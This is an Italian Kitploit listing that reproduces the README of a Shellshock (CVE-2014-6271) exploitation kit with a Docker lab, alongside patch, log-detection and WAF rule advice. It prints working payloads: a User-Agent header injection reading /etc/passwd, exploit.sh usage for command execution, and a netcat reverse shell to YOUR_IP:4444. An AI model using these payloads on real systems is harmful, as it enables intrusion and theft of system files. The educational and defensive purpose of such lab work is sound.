Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
bash-apocalypse — Ricreazione di Shellshock (CVE-2014-6271) - la vulnerabilità bash che ha messo a rischio milioni di server. Kit di sfruttamento automatico + metodologia Burp Suite + laboratorio Docker. Creato per la ricerca e l'educazione sulla sicurezza. Progetto di portfolio per la sicurezza offensiva. | Kitploit
Strumenti/GitHubGitHub/mtaha-sec/bash-apocalypse
Scanner di VulnerabilitàGenerazione di PayloadExploitEvasione IDS/IPSShellcodeSfruttamento di Applicazioni WebPenetration TestingCommand and ControlConfigurazione Errata

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Apprendimento e Formazione
Lab e Pratica
GitHubmtaha-sec/bash-apocalypse

bash-apocalypse

Vedi Repository
1 mese faNon ancora revisionato

Informazioni

Ricreazione di Shellshock (CVE-2014-6271) - la vulnerabilità bash che ha messo a rischio milioni di server. Kit di sfruttamento automatico + metodologia Burp Suite + laboratorio Docker. Creato per la ricerca e l'educazione sulla sicurezza. Progetto di portfolio per la sicurezza offensiva.

Condividi

Bash Apocalypse

Kit di sfruttamento automatizzato per CVE-2014-6271 (Shellshock)

Severity CVSS Score

Un progetto completo di ricerca sulla sicurezza che dimostra la vulnerabilità Shellshock che ha colpito milioni di server nel 2014. Include scansione automatizzata, capacità di sfruttamento e raccomandazioni difensive.

Demo


Cos'è Shellshock?

Shellshock (CVE-2014-6271) è una vulnerabilità critica nella shell Bash che consente l'esecuzione remota di codice attraverso la manipolazione delle variabili d'ambiente. Scoperta nel 2014 dopo essere esistita per 22 anni, ha colpito milioni di sistemi Unix/Linux in tutto il mondo.

Come funziona:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

I server web che utilizzano CGI passano le intestazioni HTTP come variabili d'ambiente a Bash, rendendoli vulnerabili:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Avvio Rapido

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

Caratteristiche

Scanner Automatico

  • Scopre endpoint CGI vulnerabili
  • Testa molteplici punti di iniezione (User-Agent, Referer, Cookie)
  • Supporto per wordlist personalizzate

Strumento di Sfruttamento

  • Esecuzione di comandi con cattura dell'output
  • Reverse shell automatizzata
  • Opzioni multiple di payload

Ambiente di Laboratorio

  • Configurazione Docker con un comando
  • Server vulnerabile isolato
  • Ambiente di test sicuro

Utilizzo

Scansione delle vulnerabilità

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

Esecuzione di comandi

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

Ottieni reverse shell

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

Sfruttamento Manuale (Burp Suite)

Passo 1: Intercetta la Richiesta

Intercetta Burp

Passo 2: Inietta il Payload

Sfruttamento

Modifica l'intestazione User-Agent:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

Passo 3: Osserva la Risposta

Reverse Shell

Il server esegue il tuo comando e restituisce l'output.


Analisi Tecnica

Flusso dell'Attacco

root@kitploit:~
Client (Attaccante)
    │
    │ Richiesta HTTP con User-Agent malevolo
    ▼
Server Web
    │
    │ Passa l'intestazione come variabile d'ambiente
    ▼
Script CGI
    │
    │ Avvia un processo Bash
    ▼
Shell Bash
    │
    │ Analizza la funzione + esegue i comandi successivi
    ▼
Esecuzione di comandi (RCE)

Causa Principale

Quando Bash incontra una definizione di funzione in una variabile d'ambiente:

  1. Analizza la funzione: () { :;}
  2. Bug: Continua ad analizzare ed esegue qualsiasi cosa dopo
  3. Risultato: Esecuzione arbitraria di comandi

Difesa

Mitigazione Immediata

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

Rilevamento

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

Regola WAF

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

Competenze Dimostrate

  • Test di penetrazione di applicazioni web
  • Scripting e automazione Bash
  • Manipolazione del protocollo HTTP
  • Containerizzazione Docker
  • Competenza in Burp Suite
  • Sia sicurezza offensiva che difensiva

Struttura del Progetto

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

Dichiarazione di Non Responsabilità Legale

Solo a scopo educativo. Testa solo sistemi di tua proprietà o per i quali hai esplicita autorizzazione. L'accesso non autorizzato è illegale.


Risorse

  • Dettagli CVE-2014-6271
  • Cloudflare: Inside Shellshock
  • Pratica: HackTheBox - Shocker

Costruito per capire come funzionano le vulnerabilità e come difendersi da esse. ;)

Scarica lo strumento